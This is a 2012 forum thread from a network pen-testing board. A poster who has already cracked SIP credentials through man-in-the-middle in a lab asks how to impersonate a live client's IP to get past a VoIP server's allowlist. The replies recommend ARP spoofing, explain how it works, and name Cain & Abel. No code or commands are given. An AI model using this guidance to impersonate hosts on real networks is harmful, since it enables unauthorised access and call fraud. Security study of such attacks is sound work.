.

Help Needed -- How to Takeover LAN IP Address from a Live Host?

<<

C0de_X

Newbie
Newbie

Posts: 1

Joined: Sat May 05, 2012 11:30 am

Post Sat May 05, 2012 11:32 am

Help Needed -- How to Takeover LAN IP Address from a Live Host?

Hey experts out there,

I need some urgent help & advice for my Pentest... here is the situation:

In my security testing lab environment, I have A SIP Gateway Server (let me just name it SRVA) and a SIP Client (CLTA) in the same switched LAN (same subnet). SRVA IP address is 192.168.1.100 and CLTA IP address is 192.168.1.200. All IP addresses are statically configured, no DHCP is involved.

SRVA and CLTA are communicating using SIP Protocol and they are using Digest Authentication between the two hosts. On top of the Digest Authentication, the server is also using IP Address as another security measure to authenticate the client side -- which means, on the Server it is configured to only Allow any SIP connection request originated from CLTA's IP Address (192.168.1.200), even after the Digest Authentication is successfully made -- no other source IP Address is allowed by the Server.

My task is to find a way to compromise the LAN security and successfully make VoIP calls from another computer (not CLTA). So I am almost there... as I have already cracked the SIP username and Digest Authentication Password using the Man-in-the-Middle attack. So now I have the SIP Username and the working SIP Password, as well as a free VoIP Softphone installed on my computer (IP Address 192.168.1.210). I am very close to my final objective!

However, now I am facing a challenge on how to physically takeover the IP Address of CLTA (192.168.1.200)... as the SIP Server (SRVA) will deny my SIP connection from any IP address another than 192.168.1.200 even with the correct username/password. I tried to configure my IP Address manually to 192.168.1.200, but as expected, after I do so, I receive an "IP Address Conflict" error and not able to use the network -- I am sure the CLTA side will also have that error pop up.

-- How shall I go about successfully taking over 192.168.1.200 on the LAN, while I am not allowed to shutdown CLTA or disconnect it from the network.

Need some ideas... thank you!

Regards
<<

unicityd

User avatar

Full Member
Full Member

Posts: 170

Joined: Wed Sep 03, 2008 5:33 pm

Post Sat May 05, 2012 2:02 pm

Re: Help Needed -- How to Takeover LAN IP Address from a Live Host?

"ARP Spoofing" is the technique you need.

The Wikipedia article explains the basics and lists some tools:

http://en.wikipedia.org/wiki/ARP_spoofing

The short explanation is that each computer on the LAN has a MAC address and an IP address.  Each Ethernet frame has to be addressed to the target computer's MAC address.  As you've discovered, you can't just change the IP on your computer since the OS will check to see if anyone else is using the IP and refuse if it is in use.  Instead of completely taking over the IP address (in which case you need to crash/flood/disconnect the client), you can just convince the server that your computer's MAC address is associated with 192.168.1.200.  Using ARP Spoofing software, you can pretend to own the client's IP address knowing full well that it is in use. 

ARP spoofing is a targeted attack so you can convince the server that you own the client IP address without affecting other computers.  For example, the client could still browse the web and the return traffic would reach him and not you.

Good luck with your lab.
BS in IT, CISSP, MS in IS Management (in progress)
<<

unicityd

User avatar

Full Member
Full Member

Posts: 170

Joined: Wed Sep 03, 2008 5:33 pm

Post Sat May 05, 2012 2:23 pm

Re: Help Needed -- How to Takeover LAN IP Address from a Live Host?

BTW: If you're on Windows, try Cain & Abel. 
BS in IT, CISSP, MS in IS Management (in progress)
<<

impelse

Hero Member
Hero Member

Posts: 585

Joined: Mon Feb 16, 2009 3:40 pm

Post Sun May 06, 2012 8:23 am

Re: Help Needed -- How to Takeover LAN IP Address from a Live Host?

Use the same Man-in-the-Middle that you used for getting the username and password to posing the ip address with the MAC.....
CCNA, Security+, 70-290, 70-291
CCNA Security
Taking Hackingdojo training

Website: http://blog.thehost1.com/

Return to Network Pen Testing

Who is online

Users browsing this forum: No registered users and 2 guests

.
Powered by phpBB® Forum Software © phpBB Group.
Designed by ST Software